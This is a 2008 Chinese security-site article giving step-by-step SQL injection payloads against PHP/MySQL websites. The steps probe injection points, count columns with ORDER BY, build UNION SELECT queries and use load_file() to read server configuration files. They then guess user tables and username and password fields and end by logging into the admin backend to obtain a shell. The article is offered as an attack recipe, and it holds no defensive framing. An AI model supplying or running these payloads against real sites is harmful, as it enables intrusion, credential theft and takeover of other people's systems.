| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 安全365社区 |
安全365
收藏本站
设为首页
会员登录:
站内搜索: 新闻中心 系统安全 网络安全 安全技术 下载中心
| 网络安全首页 | 信道安全 | 设备安全 | 协议安全 | Web安全 |
PHP脚本注入简单步骤
PHP难吗?PHP脚本注入的简单步骤
作者:未知 文章来源:互联网 点击数: 更新时间:2008-3-26 12:35:09

  1~判断注入点~ :’;and 1=1;and 1=2 -------(跟ASP一样)

  2~判断是否能进行UNION查询~:and ord(mid(version(),1,1))>51 -------(通过版本判断4.0以上可用UNION查询)

  3~利用order by 暴字段~:order by X -------(X为数字 如果返回正常则说明字段大于X)

  4~利用union来查询准确字段~: and 1=2 union select 1,2,3,....... -------(返回正常,就说明猜到准确字段数。)

  5~判断数据库连接帐号有没有写权限~:and (select count(*) from mysql.user)>0 ------- (如果返回错误我们就猜管理员的帐号密码如果返回正常,则可以通过

  and 1=2 union select 1,2,3,4,5,6, load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 [注意:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件])

  6~猜解XXXX表~:and 1=2 union select 1,2,3,4,5,6.... from user --------(XXXX为表单名,返回正常,说明存在这个表)

  7~猜XXX字段~:and 1=2 union select 1,username,3,4,5,6.... from XXXX -------(同样道理,自己替换,如果在2字段显示出字段内容则存在些字段)

  8~同理再猜解password字段,猜解成功再找后台登录上SHELL~

文章录入:小张    责任编辑:洋葱头 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    共同分享Spring中接口注
    PHP-Nuke SQL注入及绕过
    PHP Classifieds catid_
    Invision Power Board i
    Tagger LE PHP代码注入e
    All Topics phpBB模块SQ
    CJ Tag Board PHP远程代
    SQL通用防注入系统3.0(a
    动易所有版本的Region.a
    新云网站管理系统articl
    站长邮箱:webmaster@anquan365.com
    联系电话:86-10-67634029 点击这里给我发消息

    Copyright © 2006-2008 www.anquan365.com 北京华安普特网络科技有限公司 版权所有